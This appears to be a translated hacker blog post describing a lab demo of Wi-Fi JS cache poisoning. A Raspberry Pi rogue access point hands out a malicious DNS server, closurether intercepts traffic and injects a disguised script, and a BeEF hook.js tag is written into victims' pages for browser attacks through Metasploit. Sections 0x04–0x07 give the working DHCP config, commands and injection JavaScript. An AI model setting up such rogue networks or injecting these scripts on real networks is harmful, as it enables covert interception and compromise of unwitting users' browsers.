Another Try at JS Poisoning
I saw it half a month ago: EtherDream wrote an article about Wi-Fi traffic hijacking and JS poisoning, and we had some fun with it in the company lab. It was my first contact with this area and it felt quite fresh. Then I saw that sh4dow@lcx.cc had written an article, "Intranet DNS poisoning technology hijacking session", and I decided to share what I did.
0x01 Attack ideas
1. Use a Raspberry Pi to set up an AP and entice others to connect to it.
2. On the Raspberry Pi, set the DHCP-advertised DNS to point at a proxy host (which is actually the man in the middle).
3. Run closurether on the proxy host to perform the JS poisoning.
4. There are many kinds of payloads. The original author of closurether designed one that intercepts the user's login name and password, but that link has expired and I can't write the JS myself, so another method is needed. Here I chose to pair it with the BeEF framework and insert hook.js into the traffic.
5. Since BeEF can be used together with MSF to attack the browser, MSF is naturally required as well.
0x02 Tool preparation
EDUP mini USB wireless NIC, driver-free (RTL8188CUS)
Raspberry Pi, running the Raspbian image.
Summer from our team suggested flashing OpenWrt onto a TP-Link TL-WR703N, which is portable and can implement many other features.
That idea has not been tried yet: after OpenWrt is flashed onto the router there is no space left to install anything else.
0x03 Set up the Raspberry Pi
First, get the Raspberry Pi running. Anyone who has played with one knows how: download the image, write it to the card, and so on; I won't repeat it here.
Second, make the Raspberry Pi work as a router.
Details can be found here: http://www.daveconroy.com/using-your-raspberry-pi-as-a-wireless-router-and-web-server/
This is the first article on using a Raspberry Pi to build a wireless AP. It is thorough, covering both the principles and the specific configuration; follow it step by step and nothing surprising happens.
The forged Wi-Fi name here is that of the bar where I learned to mix drinks. My master was one of Lavazza's top baristas. But that bar has closed...... Anyone in Nanjing who is interested, there is a place where you can have me mix you a drink.
0x04 Create the man-in-the-middle
In the JS Cache Poisoning article, the author explains the principle in great detail and provides the implementation code.
The platform I tested on was Mac OS X 10.0 (a Hackintosh); installation was easy and nothing went wrong.
First, install node.js.
Then install closurether:
npm install -g closurether
Run closurether:
closurether
If closurether runs successfully, the following information is displayed (on Linux closurether needs elevated privileges to run, and on Windows no other service may be occupying ports 80 and 443):
sudo closurether
Password:
[SYS] local ip: 172.16.6.37
[DNS] running 0.0.0.0:53
[WEB] listening 0.0.0.0:80
[WEB] listening 0.0.0.0:443
Now, if you set the browser's proxy to 127.0.0.1:80, you can see all the traffic hijacked by closurether, including DNS resolutions and HTTP requests.
If you do this and view the page source in the browser, you will see that a script tag has been embedded in the source: that is the attack code implanted by closurether.
To disguise it, the address is written as http://10086.cn/js10086/201306301200.js
but in fact 10086.cn may not have such a file at all.... I disguised mine as a google-analytics site-analytics script.
You can change the attack script and the disguise in the config.json file.
0x05 Modify DNS
The proxy (man-in-the-middle) is ready, so now traffic must be directed to it. As mentioned above, setting the browser proxy achieves this, but the ideal way is the DNS modification the author provides.
Modify the DNS settings to point at the proxy server. Then everyone using this Wi-Fi network resolves domain names to the proxy server, and after DNS resolution their HTTP traffic is also directed to the proxy, which makes closurether a man-in-the-middle.
In the Raspberry Pi's DHCP settings:
subnet 192.168.1.0 netmask 255.255.255.0 {
    # pool starts at .2 so that it does not include the router's own address .1
    range 192.168.1.2 192.168.1.254;
    option routers 192.168.1.1;
    # clients are told to use the closurether host as their resolver
    option domain-name-servers 172.16.6.37;
    interface wlan0;
}
172.16.6.37 is my local machine (the host running closurether).
Now, when a device connected to the Wi-Fi performs DNS resolution, the result is 172.16.6.37,
so all of its other requests go to the proxy as well.
PS: the author of closurether thought this through carefully. JS poisoning can only target HTTP or HTTPS; for any other protocol, on the second request the real DNS result is returned to the client, so it is not easily discovered.
0x06 BeEF and MSF
Other people's articles explain these more clearly than I could.
However, there are still few articles on BeEF, and I am still exploring its functions one by one.
BeEF and MSF need to work together.
Use
msfconsole -r beef.rc
to create the XMLRPC service for MSF; after BeEF starts, it will call it automatically.
beef.rc has the following content:
load xmlrpc ServerHost=<Server IP> Pass=<password> ServerType=Web
0x07 Scatter the poison to the sky and let it fly with the wind (villain music should play here)
Make the following changes in closurether:
Modify asset/inject/extern.js and add:
// build a script tag that loads BeEF's hook and write it into the page
var commandModuleStr = '<script src="http://172.16.6.37:3000/hook.js" type="text/javascript"><\/script>';
document.write(commandModuleStr);
http://172.16.6.37:3000/hook.js is BeEF's hook script. In theory this script could be placed anywhere, or injected directly into the traffic by closurether, but since I don't understand JS I haven't tried much more.
Then wait for the fish to bite.
The next step is using BeEF and MSF to attack the browser.
According to the author of closurether, the injected JS scripts stay in users' caches for a long time, so maybe one day in the future a device will suddenly come online.
It seems that BeEF can be used to make the user's browser download a backdoor file.
0x08 Summary
1. These are all predecessors' work; I just combined them, without any innovation to speak of.
2. hook.js has no effect on mobile browsers.
3. MSF's exploit library is not as powerful as you might think. To take over a poisoned computer in one stroke, you would probably need several 0-days.
4. I suddenly feel very conflicted about 360's clear-browser-cache function......
5. Using a Raspberry Pi to implement this is just for work needs: I often go out to give lectures, and this set of devices makes for a good demonstration. In practice, the likely problem is that the Raspberry Pi and the man-in-the-middle server must both have a connection to the Internet.
6. Installing closurether on the Raspberry Pi also has some problems that I have not studied in depth.